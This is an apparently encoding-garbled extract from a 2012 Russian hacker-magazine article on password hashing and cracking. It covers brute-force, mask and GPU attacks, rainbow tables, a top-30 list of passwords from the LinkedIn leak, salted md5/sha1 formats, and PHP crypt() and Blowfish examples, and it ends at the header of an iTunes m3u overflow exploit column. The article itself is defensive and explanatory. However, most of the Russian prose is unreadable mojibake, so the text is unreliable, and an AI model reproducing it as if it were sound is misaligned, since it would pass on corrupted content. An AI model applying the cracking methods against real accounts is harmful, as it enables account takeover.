J" (1&93+ 9=#-.6, ($-4=$9")1-' *"<' 9'2$9")3, ?)$ '*($-4=8A) )"%'1 (&$*)31 6-. 9$**)"2$9-12'. ("&$-'. J$ )"% -' 5)$? K %$21?-2$< *?1)1 %$<("2'' 86"-$*4 &"*B';&$9")4 ' (&$"2"-'='&$9")4 9*1

!"#$%

&'()* 09 /164/ 2012058

TOP-30 !"#$%&' () *+&,-&' .")/ LINKEDIN

!"#$%&, '"' (%$)*+,, -"' & !#$(-+,. .,/"*&01+ 0"2&-+ !"#$%,3, 4&56#&#$7"78&, 7 &(-$#&9/ :-&/ 6-,;,', *"(-$%<'$ !#&1&-&7*+, ;-$ !#& ),%"*&& =%9 7$((-"*$7%,*&9 &(/$=*+/ ="**+/ 1$)*$ &(!$%<0$7"-< 1&*&1"%<*+, #,(6#(+. >-$&- %& 7 -"'$1 (%6;", 5$7$-#&-< $ -$1, *"('$%<'$ 6907&1+1& 1+ (-"*$7&1(9 ( *,6(-$3;&7+1& /,8"1&, '$-$#+, %,5'$ 7('#+7"?-(9 #,(6#("1& '&-"3('$3 @A.-7&=,$'"#-+ (-$&1$(-<? 42 =$%%"#"? B$01$)*$ %& (62,(-7,**$ 6(%$)*&-< 0%$61+8%,**&'"1 7$((-"*$7%,*&, !"#$%,3 !$%<0$7"--,%,3 ( 6-,'8,3 CD? B$01$)*$! >,5$=*9 9 #"(('")6 -,E, $ -$1, '"' (*&0&-< #&('& 7$((-"*$7%,*&9 !"#$%,3 &0 *,6(-$3;&7+/ /,8,3.

FGFHF IF JAKL D%9 -$5$ ;-$E+ !$*9-<, *"('$%<'$ :44,'-&7,* 1,-$= /,8&#$7"-*&9 !"#$%,3, ="7"3 $0*"'$1&1(9 ( (62,(-76?2&1& (!$($E"1& «7$((-"*$7%,*&9» 0*";,*&9, ('#+7"?2,5$(9 0" /,8,1. L/ *, -"' 1*$5$, & 9 =61"?, -+ (%+8"% $E$ 7(,/.1. .0123405 (Brutforce) — #"0%&;"?- $(*$7*+, -#& -&!" E#6-4$#(":• 21647 (dummy) — !,#,E$# 7(,/ 7$01$)*+/ 0*";,*&3. M-$- !$=/$=

=$7$%<*$ 6(-"#,% & 7 ;&(-$1 7&=, 6), *, !#&1,*9,-(9 *&5=,;

• 89:;4<<=7 (template) — !,#,E$# ( &(!$%<0$7"*&,1 (!,N&"%<-*+/ 8"E%$*$7 regexp, " -"'), ( !#&1,*,*&,1 #"0%&;*$5$ #$=" (%$7"#,3;

• >?520@A9;B<=7 (extreme) — !,#,E$# !#& !$1$2& (#,=(-7 GPU. >$7#,1,**+, 7&=,$'"#-+, !$==,#)&7"?2&, -,/*$%$5&? CUDA, AMD OpenCL, !$07$%9?- !,#,E&#"-< 7(, 7$01$)*+, '$1E&*"-N&& 8,(-&0*";*+/ !"#$%,3 1,*<8, ;,1 0" 1&*6-6, " (,1&0*";-*+, — *, E$%<8, ;,1 0" 8,(-< 1&*6-. L(!$%<069 -,/*$%$5&& -&!" CrossFire & Stream, 1$)*$ & 7$7(, $EO,=&*9-< 7&=,$'"#-+ 7 $=&* 1"((&7 =%9 E$%,, :44,'-&7*$5$ !,#,E$#". >'$#$(-< !,#,E$#" 0*";,*&9 !#& :-$1 1$),- E+-< #"((;&-"*" !$ 4$#16%,:

DZȤșȘȡșș ȖȤșȠȳ (t) ȣșȤșȕȢȤȔ (W) ȡȔ N-Ƞ ȞȢȟȜȫșȥȦȖș ȖȜȘșȢȞȔȤȦt = ((W)/N1 + N2 + N3 + ... + Nn)/2

2. P,#,E$# !$ «Rainbow tables» (#"=6)*+, -"E%&N+) — !$ (6-&, :-$ -$- ), !,#,E$#, -$%<'$ ( &(!$%<0$7"*&,1 0"#"*,, (5,*,#&#$7"*-*+/ (!,N&"%<*+1 $E#"0$1 -"E%&N. @;,*< :44,'-&7*$ !#&1,*9-<

link941 1234

435 work294

angel176

soccer45

65432132

pepper31

iloveyou26

career26

123456728princess

29devil30

killer32

killer32

dragon46

jordan48

michael52

d**k60

b**ch65

master72

12345676

monkey78

f**k85 connect

91 jesus95 sex

119 ilove133 the

143 12345179

job205

god214

!"#$%& "'(%"')*%& +,%-.#'"'/%.%+% 0(%.')., (.# 01&2' SHA1(SHA1(SHA1(..($hash)))) 345&. 5#3'6/7.8 ,'4"59 6 SHA1.:0& 39/# 39 %2&""# .'+, &0/% 39 "& #5"# ;4"5'2&".'/8"#& 06#<0.6# '/$#,%.2' SHA1. => "&$# 0/&54&., (.# 69(%0/%.&/8"# "&6#>2#?"# "'-%0'.8 .'+4) ;4"+@%) SHA1000, +#.#,'7 345&. A+6%6'/&"."'

.907(&+,'."#24 6/#?&""#24 69>#64 SHA1 % -,% A.#2 345&. /&$+# 69(%0/%2'. B3,'.% 6"%2'"%&, (.# ,&>4/8.'. SHA1(SHA1(..($hash))) — A.# "& .# ?& 0'2#&, (.# 5#3'6%.8 3#/8C& ,'4"5#6 6"4.,8 SHA1, .'+ +'+ .'2 &0.8 &*& -,&- % -#0.#3,'3#.+'. D&>4/8.'.#2 .'+#$# 1&C%,#6'"%7 2#?&. 0.'.8 "&69$#5"9< 6# 60&1 #."#C&"%71 ,'01#5 -,#@&00#,"91 ,&04,0#6.

$-(.," C"D(C"EF(G ,#(!+$"C"%(+(,$H

!"#" $ %&'()$*)$+%', ("&$-.,

!"#$% 09 /164/ 2012 059

$password = "passwd"; // ǢȖșȘșȡȡȯȝ ȣȢȟȰțȢȖȔȦșȟșȠ ȣȤȢȥȦȢȝ ȣȔȤȢȟȰ, ȞȢȦȢȤȯȝ ȥ ȖșȤȢȳȦȡȢȥȦȰȲ 99,9% ȕȧȘșȦ Ȗ ȤȔȘȧȚȡȢȝ ȦȔȕȟȜȪș ȦȜȣȔ low-alphaecho sha1($password); // ǯȢ ȣȢȡȳȦȡȯȠ ȣȤȜȫȜȡȔȠ Ƞȯ ȕȢȟȰȬș ȡș ȜȥȣȢȟȰțȧșȠ ȔȟȗȢȤȜȦȠ md5 Șȟȳ ȩșȬȜȤȢȖȔȡȜȳ ;-)$salt = "S$4(!@#$%^17BB5G)$11_S2"; // ǨȥȣȢȟȰțȧȳ ȥȟȧȫȔȝ- ȡȯȝ ȡȔȕȢȤ ȥȜȠȖȢȟȢȖ, Ƞȯ ȠȢȚșȠ ȜțȠșȡȜȦȰ țȡȔȫșȡȜș ȩșȬȔecho sha1($salt . $password); // Ǡ ȖȢȦ ȩșȬ Șȟȳ ȠȔȤȜȡȢȖȔȡ- ȡȢȗȢ ȣȔȤȢȟȳ ȥ ȥȢȟȰȲ// DzȔȞȔȳ ȞȢȠȕȜȡȔȪȜȳ ȣȔȤȢȟȳ Ȝ șȗȢ ȩșȬȔ ȡș ȡȔȝȘșȦȥȳ ȡȜ Ȗ ȢȘȡȢȝ ȤȔȘȧȚȡȢȝ ȦȔȕȟȜȪș

!)")'/0*%". *$-1 ' ($2$3450 %$4*)&6%7'' 8$#6) *-69')1 2$*)")$/4$ ,$&$:$ 2$ )0, ($&, ($%" *)&6%)6&" ;)', %$4*)&6%7'+ ' *$-1 ,&"4.)*. < )"+40. =*-' 90 >-$685:-044'% *8$90) &">-&0<0&*')1 "-#$&')8 ' 6>4")1 >":')5+ *)")'/0*%'+ (/)$ <"94$!) *0%&0)45+ %-?/ ,0:'&$<"4'., )$ 690 ($4.)4$, /)$ 086 40 *$*)"<') )&62" 8$2'@'7'&$<")1 ($2 *03. *<$? «&"26946? )"3-'76».

A"% %"% ($-"#")1*. 4" *'*)086 >"B')5 *0&<0&" 40-1>., 4694$ '*%")1 2&6#$+ <"&'"4). C$-00 62"/458 <"&'"4)$8 8$90) *)")1 #040-&"7'. 64'%"-14$+ *$-' 2-. %"92$#$ ?>0&" 4" $*4$<0 0#$ '204)'@'-%")$&", %$)$&5+ >"%&0(-.0)*. >" 4'8 ($*-0 &0#'*)&"7'' 4" &0*6&*0:

$hash = sha1($user_id . $password);

D20"-145+ <"&'"4) — #040&'&$<")1 ($-4$*)1? 64'%"-146? *$-1:

// ǣșȡșȤȜȤȧșȠ ȥȟȧȫȔȝȡȧȲ ȥȦȤȢȞȧ ȘȟȜȡȢȝ Ȗ 22 ȥȜȠȖȢȟȔ function unique_salt() { return substr(sha1(mt_rand()),0,22);}

$unique_salt = unique_salt();$hash = sha1($unique_salt . $password); // ǧȔȡȢȥȜȠ Ȗ ȣșȤșȠșȡȡȧȲ hash ȧȡȜȞȔȟȰȡȯȝ ȠȔȤȜȡȢȖȔȡȡȯȝ ȩșȬ

E"2$ $)80)')1 $/041 <"945+ 4?"4* — 64'%"-146? *$-1 )"%90 4694$ 3620) >"4$*')1 < 3">6 ($(6)4$ * ,0:08 %"% 2<$+46? ("&6. E$ 2"90 ($-6/'< % 40+ 2$*)6(, >-$685:-044'% <&.2 -' *8$90) *#040&'&$<")1 40*%$-1%$ 8'--'$4$< &"26945, )"3-'7 &">80&$8 < 2$3&50 )5*./' )0&"3"+) :).

F"<"+ 4084$#$ ($#$<$&'8 $ (-?*", ' 8'46*", 80)$2$< ' "-#$&')-8$< ,0:'&$<"4'.. C $24$+ *)$&$45 *%$&$*)1, * 2&6#$+ — 30>$("*-4$*)1. G">"-$*1 35, /08 35*)&00, )08 -6/:0 2-. ($-1>$<")0-0+: <$-(0&<5,, 8041:0 4"#&6>%' 4" *0&<0&, <$-<)$&5,, *%$&$*)4". &0-#'*)&"7'. ($-1>$<")0-0+. H$). /08 3$-1:0 *%$&$*)1 ,0:'&$<"4'., )08 35*)&00 0#$ *8$90) <*%&5)1 ' >-$685:-044'%. I$ *6)' 20-",

(&$)'< 2-'445, ("&$-0+. !%$&$*)1 (0&03$&" $#&"4'/'<"0)*. -':1 *%$&$*)1? (&$70**$&" ' 35*)&$20+*)<'08 ("8.)'.

GJG !EDKDAL MD!GD? D> <*0#$ *%">"44$#$ )5, 4"<0&4$0, 2$-904 35- ($4.)1, 4"*%$-1-%$ 406*)$+/'<5 *$<&0804450 %&'()$#&"@'/0*%'0 "-#$&')85 ,0:'&$<"4'. % *$<&0804458 &0"-'.8 ")"%. =*)1 40*%$-1%$ (6)0+ *4'904'. &'*%$< 4" 6&$<40 "-#$&')8$<:1. !"#$%&'$()*+, -$%,, ./+#0$"0$1.+2 )%3$/+04$(.2. 5)/+*$()*+, "67,"0(687+2 2,9,1. I$2 8"&'4$<"4'08 '800)*.

< <'26 *($*$3 '*%6**)<044$#$ 6*-$9404'. ("&$-., 4">5<"085+ 4"%-"25<"4'08 *$-'. !$-1 (&02*)"<-.0) *$3$+ 4"3$& &">-'/4$-#$ &$2" *'8<$-$<, $35/4$ ;)$ *'8<$-5 $3$', &0#'*)&$<, 7'@&5 ' *(07*'8<$-5, %$)$&50 4"%-"25<"?)*. 4" #$)$<6? ,0:-*6886 ("&$-. '-' *%-0'<"?)*. * 40+.

N*4$<4". >"2"/" *$-' — 4"80&044$0 62-'404'0 ("&$-., %$-)$&$0 >4"/')0-14$ $*-$94.0) <$**)"4$<-04'0 '*,$245, ("&$-0+ * ($8$B1? (&02<"&')0-14$ ($*)&$0445, &"26945, )"3-'7. I&' ;)$8 4"2$ 6/')5<")1, /)$ *$-1 40 >"B'B"0) $) ($-4$#$ (0&03$&" %"92$#$ ("&$-. < $)20-14$*)'! E'90 (&'<0204 *('*$% 4"'3$-00-($(6-.&45, )'($< *$-0+.

md5($pass.$salt)md5($salt.$pass)md5(md5($pass))md5(md5(md5($pass)))vBulletin < v3.8.5md5(md5($salt).$pass)md5($salt.md5($pass)) md5($salt.$pass.$salt)md5(md5($salt).md5($pass))md5(md5($pass).md5($salt))md5($salt.md5($salt.$pass))md5($salt.md5($pass.$salt))vBulletin > v3.8.5md5($username.0.$pass)md5(strtoupper(md5($pass)))sha1($pass.$salt) sha1($salt.$pass) sha1(sha1($pass)) sha1(sha1(sha1($pass)))sha1(strtolower($username).$pass)

I&'<0208 (&'80& (&$*)0+:0+ 8"&'4$<"44$+ >"B'-)5 * (&'80404'08 *)")'/0*%$+ *$-' $) &"26945, )"3-'7 md5(sha1(md5($pass))) 4" PHP:

:2,4) 6#/$7,**$1 /);6<*$1 0)-%+=> " ;%+*$1 =,#$?,., /)(*$1 0/,4. R1, R2, R3 — @6*.=++ /,;6.=++, H — @6*.=+A 2,9+/$()*+A

!"#$%

&'()* 09 /164/ 2012060

!"#$%$$&' (")* +,+-*./$&0 )/"+1,2/34"5%6)"0 3*2,/"17,8Hashcat +,99%/:"83%1 8,6613$,8*%$"% +3/,*. "# «6,*%$&0» 0%;%'

!"# $%&'% # ()*+ '#,-%+, "*" #./,0 )%1,# $#(#23%"0 4#&#"*5 6/3/(7-,*. 8%' 9 *1/ 6'%4%& — (%1/ ,/ 4,%5:/;* ;%".%6"0 4&#*;<=&/,,7-'* ,7./># ,/ 6"#7" $37 $#;#:7 *1/ >#"#)<+ 7,6"3*;/,"#) 7 ;/"#(7' 2<6"3# $/3/23%"0 2#&0=7,6")# 74 6*:/6")*5:7+ $%3#&/?.

8#,/.,# 1/, ;#1,# 4%6"%)7"0 $#&04#)%"/&/? ,%=/># 3/6*36% 74#23/"%"0 $9",%(-%"74,%.,</ $%3#&7 6 76$#&04#)%,7/; -7@3, 2*') )/3+,/># 7 ,71,/># 3/>76"3%, 6$/-7%&0,<+ 67;)#&#). A# $#-,9",#/ (/&#, ."# $37 "%'7+ 3%6'&%(%+ 6*:/6")*5:7/ $#&04#)%"/&7 !"#># 3/6*36% $3#6"#-,%$3#6"# 3%42/>*"69, % ,#)</ 2*(*" #2+#(7"0 /># 6"#3#,#?.

B#./=0 $#)<67"0 2/4#$%6,#6"0 — $37(/"69 $#"3%"7"069 ,% 3/6*36< 7 )3/;9, $37./; 6##",#=/,7/ 3/6*36</)3/;9 $39;# $3#-$#3-7#,%&0,#.

function myhash($password, $unique_salt) { $salt = "S$4(!@#$%^17BB5G)$11_S2"; $hash = sha1($unique_salt . $password); // Ǣ ȪȜȞȟș ȜȥȣȢȟȡȳșȠ ȨȧȡȞȪȜȲ 1000 ȤȔț Ȝ ȦȢȟȰȞȢ ȣȢȦȢȠ ȖȢțȖȤȔȭȔșȠ ȤșțȧȟȰȦȔȦ for ($i = 0; $i < 1000; $i++) { $hash = sha1($hash); } return $hash; }

C6&7 4&#*;<=&/,,7'* (&9 "#>#, ."#2< 6&#;%"0 )#60;767;)#&0-,<? $%3#&0, ,% ;#:,#? )7(/#'%3"/ $#"3/2*/"69 #'#&# 55 .%6#), "# $#6&/ $37;/,/,79 ;/"#(% 4%;/(&/,,#># +/=73#)%,79 $/3/2#3 )6/+ 4,%./,7? *1/ 6#6"%)7" 6/;0 &/". PROFIT! ;-)

D(#2,// (&9 4%;/(&/,79 +/=-@*,'-7? 76$#&04#)%"0 3%4&7.,</ '37$"#>3%@7./6'7/ %&>#37";<, )6"3#/,,</ 6 PHP 4.0.32 7 3/%&7-4*/;</ ./3/4 @*,'-75 crypt():

<?phpif (CRYPT_STD_DES == 1) { // ǯȤȢȦȢȦȜȣ ȨȧȡȞȪȜȜ crypt ȥȟșȘȧȲȭȜȝ: crypt (string str, [string salt]) echo 'Standard DES: ' . crypt('sanjar_satsura', 'rl') . "\n";}

if (CRYPT_EXT_DES == 1) { echo 'Extended DES: ' . crypt('sanjar_satsura', '_ J9..sanj') . "\n";}

if (CRYPT_MD5 == 1) { // ǦșȟȔȦșȟȰȡȢ șȗȢ ȡș ȜȥȣȢȟȰțȢȖȔȦȰ, ȩȢȦȳ șȥȟȜ ȖȔȚȡȔ

// Ȗȥș-ȦȔȞȜ ȥȞȢȤȢȥȦȰ ȤȔȕȢȦȯ, ȦȢ ȢȣȦȜȠȔȟȰȡȯȠ // ȖȔȤȜȔȡȦȢȠ ȱȦȢȝ ȨȧȡȞȪȜȜ ȳȖȟȳșȦȥȳ ȔȟȗȢȤȜȦȠ MD5 echo 'MD5: ' . crypt('sanjar_satsura', '$1$sanjar$') . "\n";}

if (CRYPT_BLOWFISH == 1) { echo 'Blowfi sh: ' . crypt('sanjar_satsura', '$2a$07$usesomesillystringforsalt$') . "\n";}

if (CRYPT_SHA256 == 1) { echo 'SHA-256: ' . crypt('sanjar_satsura', '$5$rounds=5000$usesomesillystringforsalt$') . "\n";}

if (CRYPT_SHA512 == 1) { echo 'SHA-512: ' . crypt('sanjar_satsura', '$6$rounds=5000$usesomesillystringforsalt$') . "\n";}?>

C6&7 )"#3#? %3>*;/," @*,'-77 crypt ,/ 2*(/" $/3/(%,, #, 2*(/" )<23%, 6&*.%?,<; #23%4#;, "%' ."# 6#&0 >/,/373*/"69 $#&,#6"05 6&*.%?,#. E#&#"#? 6/3/(7,#? ;/"#(% 4%;/(&/,79 +/=-@*,'-77 9)&9/"69 $37;/,/,7/ '37$"#%&>#37";% Blowfish. Blowfish — !"# 6$#6#2 =7@3#)%,79 6 ;/(&/,,<; %&>#37";#; 3%4(/&/,79 '&5.% (6%; %&>#37"; (#)#&0,# 2<6"3 $#6&/ )<$#&,/,79 3%4(/&/,79 '&5.% [key scheduling], % "%'1/ '#>(% ,/#2+#(7;# 4%=7@3#)%"0 2#&0=#/ 6##2:/,7/ 6 #(,7; '&5.#;). F# 6#)3/;/,,<; ;/3'%; GH "%'#? '#( (#&1/, #2/6$/.7"0 ;%'67;%&0,*5 2/4#$%6,#6"0.

function blowfi sh_hash($password, $unique_salt) { // DZȢȟȰ Șȟȳ Blowfi sh ȘȢȟȚȡȔ ȕȯȦȰ ȘȟȜȡȢȝ Ȗ 22 ȥȜȠȖȢȟȔ return crypt($password, '$2a$10$'.$unique_salt); }

EI8JKLCAGC M7&0,%9 '37$"#>3%@79, /6&7 )6/ 6(/&%"0 )/3,#, (%/" ;,#>#/, ,# #,% ,/ $%,%-/9. M#63/(#"#./,7/ ,% '37$"#>3%@7./6'7+ %&>#-37";%+, 6#$391/,,#/ 6 7>,#373#)%,7/; #6"%&0,<+ %6$/'"#) 2/4#$%6,#6"7, $#+#1/ ,% $#$<"'* 4%:7"7"0 (#; — ,/ $#6"3#7) 4%2#3 )#'3*> ,/>#, % *6"%,#)7) #>3#;,<? 6"#&2 ) ,%(/1(/, ."# $3#"7),7' ,%&/"7" $39;# ,% ,/>#. M##23%47"/&0,<? ,%$%(%5-:7? $3#6"# #2#?(/" %&>#37";<. G,#>(%, 74#23/"%9 ,#)<? 6$#6#2 )4&#;% 676"/;<, ;< 76$#&04*/; "/ 1/ 6"%3</ #=72'7, '#"#3</ 3%43%2#".7'7 $#)"#395" 6,#)% 7 6,#)%. N6/ ,#)#/ — +#3#=# 4%-2<"#/ 6"%3#/. z

!"#" $ %&'()$*)$+%', ("&$-.,

!"#$% 09 /164/ 2012 061

!"#$%# &#' ()*#)+), -. /)() *(0"(1, -2$-( 0(-3),, 0(&#'2 234*+'(1)+ 56*.7) * 8"+0)(9".:+&#18+; .<9("+)'.; ;#=+"(*.-+3. >#%, (1-(*-(? @#<,7 0"+'#-#-+3 8"+0)(9".:++ +4-.&.<,-( 3*<3<(1, 18"6), +-:("'.@+7 +, 8.8 1<#%1)*+#, 1%#<.), 0".8)+&#18+ -#*(4'($-(? ".1=+:"(*82 4.;#=+"(*.--(9( 1((5A#-+3, 0(18(<,82 @+8<+&#18+# .<9("+)'6 ;#=+"(*.-+3 56<+ +4-.&.<,-( 0(%*#"$#-6 8(<<+4+3'. B)(56 /)( 0(-3),, -# -2$-( 56), 8"2)6' '.)#'.)+8('.

CA# -#%.*-( (0"+'#"-( =#1), <#) -.4.%) 8(<<+4++ %<3 8"+0)(9".:+&#18+; .<9("+)'(* ;#=+"(*.-+3 '(9<+ 0(8.4.),13 :.-).1)+8(?, . 1#9(%-3 /)+' 2$# -+8(9( -# 2%+*+=,. D#8(9%. «21)(?&+*6#» .<9("+)'6 ;#=+"(*.-+3 MD4/MD5, 1).*=+# 1).-%.").'+ %#-:.8)( *( '-(9+; 0"(#8).; + "#=#-+3; * (5<.1)+ 0"(%28)(* +-:("'.@+(--(? 5#4(0.1-(1)+, )#0#", 0(<-(1),7 5#4-.%#$-6 + %(<$-6 56), ()0".*<#-6 )(<,8( * (%-(' -.0".*<#-++… %., )6 29.%.<: * 1.'(# /dev/null :).

!"+'#"-( )( $# 1.'(# 0"(+1;(%+<( * 1995 9(%2 1 .<9("+)'(' DES. !(1<#%1)*+3, 8()("6# (- (1).*+<, %( 1+; 0(" %.7) ( 1#5# 4-.),. D( 0(&#'2, (1(4-.*.3, &)( .<9("+)' 5(<## -# 5#4(0.1#-, '6 0"(%(<$.#' #9( +10(<,4(*.),? >(4'($-(, 0()('2, &)( 0"(1)( 0"+*68<+ 8 /)+' .<9("+)'.' ;#=+"(*.-+3, *#%, (-+ 0"(&-( *(=<+ * -.=2 $+4-,. E()3 #1), #A# (%+- *.$-6? '('#-): <#-,-'.)2=8., + () -## -+82%. -# %#-#=,13, .9. :). F(<## 0(%"(5-( ( 8(<<+4+3; 8"+0)(9".:+&#18+; :2-8@+? + )+0.; .).8 )6 '($#=, 0"(&+).), * '(#? 1).),# «G0.1-6? %*(?-+8», (025<+8(*.--(? * -('#"# 159 -.=#9( $2"-.<..

C1<+ ;("(=( ".45+".),13 * '.)#'.)+8# + 0"+8<.%-(? 8"+0)(9".:++, #1), *(4'($-(1), -.?)+ (=+582 * .<9("+)'# ;#=+"(*.-+3, ).8 8.8 &#' 1<($-## .<9("+)', )#' 5(<,=# *#"(3)-(1)+ ## -.;($%#-+3. D.%( 0(-3), ).827 *#A,: * 8"+0)(9".:++, 8.8 + * 0"(9".''+"(*.-++, &#' 5(<,=# 0"(#8), )#' 5(<,=# (=+5(8. H7%3' 1*(?1)*#--( (=+5.),13, 0(/)('2 0"+ 0(+18# (=+5(8 *1#9%. #1), -.%#$%. -. -#4.'#-+'6? * /)(? (5<.1)+ &#<(*#&#18+? :.8)(" :). !"+ 0(")+"(*.-++ 8"+0)(9".:+&#18+; .<9("+)'(* + -.0+1.-++

(5#")8+ ).8$# -# +18<7&#-( 0(3*<#-+# (=+5(8. > 8.&#1)*# 0"+'#". '($-( 0"+*#1)+ -.5(" 4.'#&.)#<,-6; (=+5(8, -#%.*-( (5-."2$#--6; * "#.<+4.@++ 8<.11. RSACryptoS-erviceProvider 5+5<+()#8+ .NET Framework. I.8 (8.4.<(1,, 4.3*<#--6# * 8<.11.; RSACryptoServiceProvider + DSACryp-toServiceProvider '#)(%6 SignHash +'#7) 9<20#?=27 (=+582, 8()(".3 4.8<7&.#)13 * 01#*%(".-%('+4.@++ )"#; +4 &#)6"#; 5<(8(*. J)(9: +75% 8 .).8.' -. RSA =+:"(*.-+# * VM .NET.

K-(9+# $2"-.<,-6# + -.2&-6# 1).),+ <753) (0+16*.), 8"+0)(9".:+&#18+# 0"(%28)6 * )#"'+-.; .<9("+)'(* + %<+-6 8<7&#?. L<9("+)'6 5<.9(4*2&-6: +; (0+1.-+# '($#) 56), -#'-(9(1<(*-6' + +; <#98( 1".*-+*.), %"29 1 %"29('. «128-5+)-6# 8<7&+ (4-.&.7) *61(827 1)#0#-, 4.A+)6». «M"(?-(? DES (4-.&.#) *61(827 1)#0#-, 4.A+)6». «40-5+)-6# 8<7&+ (4-.&.7) -+48+? 2"(*#-, 4.A+)6». «2048-5+)-6? RSA <2&=# 1024-5+)-(9( RSA».

D( * "#.<# *1# -# ).8 0"(1)(. F(<## %<+--6# 8<7&+ -# *1#9%. (4-.&.7) <2&=27 4.A+)2. N.*.? 1".*-+' 8"+0)(9".:+&#18+? .<9("+)' 1 4.'8(' -. )*(#? *;(%-(? %*#"+. F(<,=+-1)*( %*#"-6; 4.'8(* +'#7) &#)6"# '#).<<+&#18+; =)+:)., 8.$%6? +4 8()("6; '($#) -.;(%+),13 * (%-(' +4 %#13)+ 0(<($#-+?. I<7& 21).-.*<+*.#) =)+:)6 * (1(5(? 8('5+-.@++. C1<+ 8<7& 21).-(*+) +; *1# 0".*+<,-(, 4.'(8 ()8"(#)13. M.8+' (5".4(', '($#) 56), )(<,8( 10 )613& ".4<+&-6; 8<7&#?, + *4<('A+8, 9()(*6? +10"(5(*.), +; *1#, (534.)#<,-( 0(0.%#) 8 )#5# * %('. D( 2<2&=#--6? 4.'(8 1 %#13),7 =)+:).'+, %.7A+? 10 '+<<+."%(* *(4'($-6; 8<7&#?, &.1), +4 8()("6;, -#1('-#--(, 52%#) 4.5".8(*.-. +<+ 52%#) 1(%#"$.), %#:#8), #1)#1)*#--(, -# 1%#<.#) )*(# $+<+A# 5#4(0.1-##. !".*+<,-6# ;#=-8"#8#"6 -# +106)6*.7) 8.$%6? *(4'($-6? 8<7& (.).8. «* <(5»), 5(<,=+-1)*( %.$# -# -.1)(<,8( ;+)"6, &)(56 *4<('.), 4.'(8 (8"+0)(9".:+&#18.3 .).8. -. .<9("+)'), + +10(<,427) 9()(*6# +-1)"2'#-)6 + "#8('#-%.@++. H2&=+# 4.'8+ -# 10.12) () ).8+; .).8, 0(8. 52%2) 12A#1)*(*.), (=+58+ * .<9("+)'.; 0"(#8)+"(*.-+3.

!"#$%& '&($')*&$) &+,*-%"').?

!(% *0#&.)<#-+#' () 2)#&8+ -#18(<,8+; '+<<+(-(* ;#=#? 0."(<#? 0(<,4(*.)#<#? 1.?)(* LinkedIn, eHarmony + Last.fm, !(<-E#--+-9 I.'0 (Poul-Henning Kamp), (5O3*+<, &)( 1(4%.--27 +' * 1995 9(%2 "#.<+4.@+7 1+1)#'6 ;#=+"(*.-+3 0."(<#? md5crypt 5(<,=# -#<,43 1&+).), 5#4(0.1-(?.

!( 1<(*.' !(<.-E#--+-9. I.'0., md5crypt +1&#"0.< 1#53 8.8 .<9("+)' ;#=+"(*.-+3 0."(<#?. P(*"#'#--6# +-1)"2'#-)6 0(%5(". 0."(<#?, 10(1(5-6# 0"(*#"+), '+<<+(- 8('5+-.@+? * 1#82-%2, 5<.9(%."3 4.%#?1)*(*.-+7 1"#%1)*

GPU-.81#<#".@++ '(92) *(11).-(*+), <75(? 1#'+1+'*(<,-6? 0."(<, 0( ;#=2 md5 '#-,=# &#' 4. =#1), '+-2), . %<3 =#1)+1+'*(<,-(9( 0#"#5(" *1#; 4-.&#-+? + *(*1# 52%#) 1(1).*<3), 0"+'#"-( '+-2)2. M.8 8.8 *( '-(9+; 1+1)#'.; %<3 ;#=+"(*.-+3 0."(<#? 0( 2'(<&.-+7 0(-0"#$-#'2 +10(<,42#)13 md5crypt, !(<-E#--+-9 I.'0 0"+4*.< 0(<,4(*.)#<#? + ".4".5()&+8(* GP 0#"#?)+ -. 5(<## 1)(?8+# .<9("+)'6.

!(<-E#--+-9 -# 28.46*.#) -. 8(-8"#)-6? .<9("+)', -( 1(*#)2#) +10(<,4(*.),

-#8()("6# '#)(%6 0(*6=#-+3 4.)".) *6&+1<+)#<,-6; "#12"1(*, -.0"+'#" @+8<+&-(# *<($#--(# ;#=+"(*.-+# +<+ 8('5+-.@+7 "#42<,).)(* ".4-6; .<9("+)'(* ;#=+"(*.-+3. N<3 1.?)(* 1 5(<## &#' 50 )613&.'+ 0(<,4(*.)#<,18+; .88.2-)(* !(<-E#--+-9 I.'0 0("#8('#-%(*.< +10(<,4(*.), 1(51)*#--6? '(%+:+@+"(*.--6? .<9("+)', 5.4+"27A+?13 -. 1)(?8+; ;#=.; , ).8+; 8.8 SHA (&)(56 ("9.-+4(*.), 0"(@#11 0(%5(". 0."(<#? %<3 -#1).-%.")-(9( .<9("+)'., %(0(<-+)#<,-( 0()"#52#)13 (0"#%#<+), + *(11(4%.), #9( <(9+82).

/*)"0 MD5CRYPT !"1#$023&4 3$5$,"!/'3"'). 1/33"6" /46"0-)%/ - !0-,*/4 !$0$7)- 3/ 5"4$$ ')"72-$ %$)"18 9$:-0"*/3-+ !/0"4$7

WWW

• !;< =<>?@ A B;CDE<>;FGCC: bit.ly/OG1QAN;• HFIF JKLKM Linke-dIn: bit.ly/KhFthl;• NK?N<>< < JKLFJ C HKI<DFON<? J;FNKNCC DF;<PKM: bit.ly/OyWncY;• time-memory trade off C NK;F=QRN@K EFHPCS@: bit.ly/OyWzsJ;• ?FETFOEU D< ;F=QRN@? EFHPCSF?: bit.ly/nZbiMz;• oclHashcat — NFCPQTLCM GPU-H;QEG<;OK;: hashcat.net/oclhashcat;• ><E<A@K ;F=QRN@K EFHPCS@: bit.ly/MvPXuE;• Online Hash Genera-tor (345 FP><;CE?<A): bit.ly/cHved.

DVD

*OKA<I?<RN@K ;KFPCIFSCC ?F;CN<AFNN<>< JKLC;<AFNCV E@ ?<RKLU NFMEC A HCHPC<EKBK, D;K=OEFAPKNN<M NF NFLK? =COBK (src/php_salthash_func-tion.inc.php).

062 !"#$% 09 /164/ 2012

&'()* / !"#!$ %&'()!*+!,

1 Apple iTunes 10: +,-,+./0,01, 234,-5 05 67,8, +-1 .2-52.78, -5691-,00.:. m3u-45;/5

CVSSV2 9.3

(AV:N/AC:M/AU:N/C:C/I:C/A:C)) BRIEF !"#" $%&'(": 25 !"#$ 2012 %&'()*#+$: Rh0, sinn3rCVE: CVE-2012-0677

